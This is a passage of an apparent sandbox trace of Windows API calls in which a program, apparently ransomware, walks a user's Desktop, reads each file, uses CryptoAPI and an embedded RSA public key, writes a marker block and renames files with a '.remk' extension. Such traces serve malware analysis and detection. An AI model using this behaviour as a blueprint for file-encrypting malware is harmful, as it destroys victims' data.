pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.367] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.367] GetLastError () returned 0x0 [0231.367] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.367] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.367] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.367] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.367] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17c70) returned 0x37c2278 [0231.368] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c13f8 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddb8 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1440 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddd0 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.369] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede18 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ede00 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.370] GetCurrentThreadId () returned 0x314 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697648 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.370] GetCurrentThreadId () returned 0x314 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edde8 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede30 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede90 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede30 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede30 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.374] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17c68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.374] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.374] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.374] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.374] CloseHandle (hObject=0x640) returned 1 [0231.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.378] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kcgsXO3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kcgsxo3.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kcgsXO3.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kcgsxo3.gif.remk")) returned 1 [0231.381] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9be3a700, ftCreationTime.dwHighDateTime=0x1d5ddd8, ftLastAccessTime.dwLowDateTime=0x269252a0, ftLastAccessTime.dwHighDateTime=0x1d5d912, ftLastWriteTime.dwLowDateTime=0x269252a0, ftLastWriteTime.dwHighDateTime=0x1d5d912, nFileSizeHigh=0x0, nFileSizeLow=0x302b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KlHpA7bv.wav", cAlternateFileName="")) returned 1 [0231.381] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KlHpA7bv.wav") returned=".wav" [0231.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KlHpA7bv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klhpa7bv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.381] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=12331) returned 1 [0231.381] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.386] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3005, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.386] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.388] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x302b, lpOverlapped=0x0) returned 1 [0231.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.389] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.390] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.390] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.390] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.390] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.390] GetLastError () returned 0x0 [0231.390] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.390] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.390] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.390] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.390] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.390] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.391] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x302b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.391] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.391] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.391] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.391] CloseHandle (hObject=0x640) returned 1 [0231.392] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KlHpA7bv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klhpa7bv.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KlHpA7bv.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klhpa7bv.wav.remk")) returned 1 [0231.394] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf1e9f0, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xe49318f0, ftLastAccessTime.dwHighDateTime=0x1d5dce3, ftLastWriteTime.dwLowDateTime=0xe49318f0, ftLastWriteTime.dwHighDateTime=0x1d5dce3, nFileSizeHigh=0x0, nFileSizeLow=0x236f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LVyvDGQMzfnGN8ouyoSW.gif", cAlternateFileName="LVYVDG~1.GIF")) returned 1 [0231.394] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LVyvDGQMzfnGN8ouyoSW.gif") returned=".gif" [0231.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LVyvDGQMzfnGN8ouyoSW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lvyvdgqmzfngn8ouyosw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.394] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=9071) returned 1 [0231.394] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.397] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2349, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.397] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.398] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x236f, lpOverlapped=0x0) returned 1 [0231.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.399] lstrlenA (lpString="-----BEGIN PUBLIC 